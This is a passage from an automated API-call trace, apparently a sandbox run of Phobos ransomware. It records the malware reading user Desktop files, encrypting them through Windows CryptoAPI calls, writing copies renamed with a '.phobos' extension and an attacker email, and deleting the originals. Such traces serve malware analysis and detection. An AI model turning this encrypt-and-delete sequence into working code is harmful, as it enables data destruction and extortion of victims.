lpNewFilePointer=0x0) returned 1 [0195.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\NwMSUJw.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\nwmsujw.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.973] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.973] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.973] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xba5b, lpOverlapped=0x0) returned 1 [0195.975] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xba60, dwBufLen=0xba60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xba60) returned 1 [0195.975] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xba60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xba60, lpOverlapped=0x0) returned 1 [0195.977] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.977] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.977] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.977] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.977] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.977] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.977] CloseHandle (hObject=0xac) returned 1 [0195.977] CloseHandle (hObject=0xb8) returned 1 [0195.977] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\NwMSUJw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\nwmsujw.m4a")) returned 1 [0195.978] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oV5O5D9wSdG_MOwsY0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ov5o5d9wsdg_mowsy0.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.979] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=95169) returned 1 [0195.979] CloseHandle (hObject=0xb8) returned 1 [0195.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oV5O5D9wSdG_MOwsY0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ov5o5d9wsdg_mowsy0.mkv")) returned 0x20 [0195.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oV5O5D9wSdG_MOwsY0.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ov5o5d9wsdg_mowsy0.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oV5O5D9wSdG_MOwsY0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ov5o5d9wsdg_mowsy0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.979] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.980] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oV5O5D9wSdG_MOwsY0.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ov5o5d9wsdg_mowsy0.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.980] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.980] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.980] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x173c1, lpOverlapped=0x0) returned 1 [0195.982] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x173d0, dwBufLen=0x173d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x173d0) returned 1 [0195.983] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x173d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x173d0, lpOverlapped=0x0) returned 1 [0195.985] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.985] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.985] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.985] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.985] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.985] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.985] CloseHandle (hObject=0xb8) returned 1 [0195.985] CloseHandle (hObject=0xac) returned 1 [0195.986] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oV5O5D9wSdG_MOwsY0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ov5o5d9wsdg_mowsy0.mkv")) returned 1 [0195.987] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVdUh4Ugc.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovduh4ugc.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.988] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=33982) returned 1 [0195.988] CloseHandle (hObject=0xac) returned 1 [0195.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVdUh4Ugc.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovduh4ugc.csv")) returned 0x20 [0195.988] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVdUh4Ugc.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovduh4ugc.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVdUh4Ugc.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovduh4ugc.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.988] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.989] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVdUh4Ugc.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovduh4ugc.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.989] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.989] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.990] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x84be, lpOverlapped=0x0) returned 1 [0195.992] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x84c0, dwBufLen=0x84c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x84c0) returned 1 [0195.992] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x84c0, lpOverlapped=0x0) returned 1 [0195.993] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0195.993] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.993] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.993] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.993] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.994] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.994] CloseHandle (hObject=0xac) returned 1 [0195.994] CloseHandle (hObject=0xb8) returned 1 [0195.994] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oVdUh4Ugc.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ovduh4ugc.csv")) returned 1 [0195.995] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\FL 01kmtWL5HAgmaAL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\fl 01kmtwl5hagmaal.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.997] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=68129) returned 1 [0195.997] CloseHandle (hObject=0xb8) returned 1 [0195.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\FL 01kmtWL5HAgmaAL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\fl 01kmtwl5hagmaal.flv")) returned 0x20 [0195.997] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\FL 01kmtWL5HAgmaAL.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\fl 01kmtwl5hagmaal.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\FL 01kmtWL5HAgmaAL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\fl 01kmtwl5hagmaal.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.997] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.997] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\FL 01kmtWL5HAgmaAL.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\fl 01kmtwl5hagmaal.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.998] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.998] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10a21, lpOverlapped=0x0) returned 1 [0196.036] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10a30, dwBufLen=0x10a30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10a30) returned 1 [0196.037] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10a30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10a30, lpOverlapped=0x0) returned 1 [0196.039] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.039] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.039] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.039] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.039] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.039] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.039] CloseHandle (hObject=0xb8) returned 1 [0196.039] CloseHandle (hObject=0xac) returned 1 [0196.039] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\FL 01kmtWL5HAgmaAL.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\fl 01kmtwl5hagmaal.flv")) returned 1 [0196.041] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReVcwkpnizb6rUIU.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\revcwkpnizb6ruiu.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.042] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=101653) returned 1 [0196.042] CloseHandle (hObject=0xac) returned 1 [0196.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReVcwkpnizb6rUIU.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\revcwkpnizb6ruiu.xls")) returned 0x20 [0196.042] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReVcwkpnizb6rUIU.xls.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\revcwkpnizb6ruiu.xls.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReVcwkpnizb6rUIU.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\revcwkpnizb6ruiu.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.042] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.042] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReVcwkpnizb6rUIU.xls.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\revcwkpnizb6ruiu.xls.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.043] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.043] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.043] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18d15, lpOverlapped=0x0) returned 1 [0196.044] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18d20, dwBufLen=0x18d20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18d20) returned 1 [0196.045] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x18d20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x18d20, lpOverlapped=0x0) returned 1 [0196.047] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0196.047] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.047] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.047] CryptDestroyKey (hKey=0xa32c68) returned 1 [0196.047] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.047] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.047] CloseHandle (hObject=0xac) returned 1 [0196.047] CloseHandle (hObject=0xb8) returned 1 [0196.047] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReVcwkpnizb6rUIU.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\revcwkpnizb6ruiu.xls")) returned 1 [0196.048] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t8p1dXbkwgDxC62lGDzr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t8p1dxbkwgdxc62lgdzr.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.049] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=74335) returned 1 [0196.049] CloseHandle (hObject=0xb8) returned 1 [0196.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t8p1dXbkwgDxC62lGDzr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t8p1dxbkwgdxc62lgdzr.jpg")) returned 0x20 [0196.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t8p1dXbkwgDxC62lGDzr.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t8p1dxbkwgdxc62lgdzr.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t8p1dXbkwgDxC62lGDzr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t8p1dxbkwgdxc62lgdzr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0196.049] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.049] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.049] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\t8p1dXbkwgDxC62lGDzr.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t8p1dxbkwgdxc62lgdzr.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0196.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0196.050] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.050] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1225f, lpOverlapped=0x0) returned 1 [0196.051] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12260, dwBufLen=0x12260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12260) returned 1 [0196.052] WriteFile (in: 